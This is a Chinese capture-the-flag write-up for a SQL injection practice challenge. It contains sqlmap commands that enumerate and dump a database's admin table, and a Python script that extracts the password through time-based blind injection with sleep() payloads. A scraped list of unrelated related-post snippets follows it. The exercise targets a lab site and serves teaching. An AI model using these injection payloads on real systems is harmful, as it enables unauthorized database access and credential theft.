题目链接:ctf5.shiyanbar.com/basic/inject/index.php

看起来像是注入,比较菜,就直接sqlmap了= =

1)爆库:sqlmap -u “ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login” --dbs

2)爆表:sqlmap -u "ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --table -D test

3)爆字段:sqlmap -u "ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --dump -T admin -D test

获得密码:idnuenna,登录获得key

4)最后附上大佬的exp:

#-*-coding:utf-8-*-
import requests
import time  payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}*'  #不区分大小写的  flag = ""
key=0
print("Start")
for i in range(1,50):  if key == 1:  break  for payload in payloads:  starttime = time.time()#记录当前时间  headers = {"Host": "ctf5.shiyanbar.com",  "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",  "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",  "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",  "Accept-Encoding": "gzip, deflate",  "Cookie": "Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1470994390,1470994954,1470995086,1471487815; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*67928%2CnickName%3Ayour",  "Connection": "keep-alive",  }  url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin' and case when(substr(password,%s,1)='%s') then sleep(10) else sleep(0) end and ''='&pass=&action=login" %(i,payload)#数据库  res = requests.get(url, headers=headers)  if time.time() - starttime > 10:  flag += payload  print("pwd is:%s"%flag)  break  else:  if payload == '*':  key = 1  break
print('[Finally] current pwd is %s'% flag)

【fairy】实验吧——看起来有点难相关推荐

  1. 心得体悟帖---16、哪些看起来很难做的事情真的不过如此

    心得体悟帖---16.哪些看起来很难做的事情真的不过如此 一.总结 一句话总结: 你可能会因为激情缺乏非常抵触做什么事情,但是当你做了之后,你会发现其实感觉都还挺好的. 做着做着,你会发现感觉其实挺舒 ...

  2. python显示圆周率的值是多少_用python做一个有趣的实验,看你的生日是否出现在圆周率中...

    原标题:用python做一个有趣的实验,看你的生日是否出现在圆周率中 前言: 看到圆周率这个词,突然冒出一个灵感怎么知道我的生日在不在圆周率的中又或者在第几位呢?带着这个想法去网上找了一堆数据,最后找 ...

  3. 微信抢红包MATLAB,微信红包怎么抢才是运气王?有人做了实验,看结果!

    在抢微信红包的过程中,可能许多人有这样一种感觉,抢红包貌似后抢比先抢能拿到更多的钱?有人就做了一个实验-- 友情提示: 全文约6400字,阅读全文约10分钟.如果觉得时间紧张,可以跳过实验过程直接拉至 ...

  4. 有什么看起来很难,但是其实很简单的题目

    全世界只有3.14 % 的人关注了 爆炸吧知识 做题 其实很简单 今天超模君一进办公室就感觉充满"杀气",果不其然,一抬头就看见小天拿着一张纸对着我坏笑. 莫非这家伙又要我折纸? ...

  5. 参数整定临界比例度实验_PID理解起来很难?系统讲解PID控制及参数调节,理论加实际才好!...

    在实际工程中,应用最为广泛的调节器控制规律为比例.积分.微分控制,简称PID控制,又称PID调节.PID控制器问世至今以其结构简单.稳定性好.工作可靠.调整方便而成为工业控制的主要技术之一. PID调 ...

  6. 黄牛是怎样抢票的?——从业务分析师角度看买票难问题

    摘要: 春运到了,12306被推上了风口浪尖,大家将买不到票的怨气全部吐在12306上!几年前火车票已经实名制了,那黄牛应该就找不到赚钱的空间了,但因为业务流程上的漏洞,造就了黄牛存在的空间.如何改善 ...

  7. 【汇编语言】实验3-查看PSP内容

    程序加载后,ds中存放着程序所在内存区的段地址,这个内存区的偏移地址为0,则程序所在的内存区的地址为 ** ds:0** 这个内存区的前256个字节中存放得失PSP,DOS用来和程序进行通信.从256 ...

  8. php逻辑难是难在sql,[实验吧] 所有web writeup

    实验吧 writeup 打算把实验吧所有的web题做一遍 花了一个礼拜多的时间吧 有些也看了wp不得不说收获挺大 WEB 简单的登录题 F12看下网络里面里面的请求头中有一个tips:test.php ...

  9. 实验吧-CTF-web-头有点大貌似有点难看起来有点难(学习笔记)

    实验环境 sqlmap(kali2.0) BurpsuitePro-v1.6 firefox 头有点大 题目链接:http://www.shiyanbar.com/ctf/29 打开发现说缺少 .ne ...

最新文章

  1. android 抓取native层奔溃
  2. 韩军星:汇报工作的四个层级
  3. SqlServer系统函数
  4. 测试你的电脑是否支持Hyper-V
  5. 在.NET Core 3.0中发布单个Exe文件(PublishSingleFile)
  6. Html select、option、optgroup 标签
  7. 线程同步--关键代码段(二)
  8. Hyper-V虚拟机Redhat添加网卡找不到网卡配置文件解决方法
  9. stm32 工业按键检测_STM32单片机按键消抖和FPGA按键消抖大全
  10. linxu命令个人使用总结
  11. 关于系统响应函数OnSysCommand
  12. html dom之iframe对象
  13. 【终结版】win10 激活技巧分享
  14. 产品思维训练 | 经典产品面试题
  15. vue使用百度OCR拍照识别图片信息
  16. Ckplayer视频播放器使用方法介绍
  17. 在哪自学python_怎么自学python,大概要多久?
  18. ERD图“乌鸦脚”形式表示的关系的使用方法与理解
  19. tensorflow之constant()函数
  20. QSV文件格式简单分析

热门文章

  1. 放大电路中的反馈(一)
  2. 中国粒子对撞机曝光:迄今世界最大
  3. 数据库释放空间时不能使用delete
  4. 用AI培养孩子学习兴趣:讯飞新一代智能学习机发布
  5. 计算理论导引第三版答案
  6. 《目标检测蓝皮书》第5篇 目标检测基础
  7. 计算机应用技术专业的大学生职业生涯规划书,计算机应用专业大学生职业生涯规划书范文...
  8. 人工智能课程期末总结
  9. 通量数据处理(Python)——NC格式转为CSV格式
  10. 01 | Linux详细简介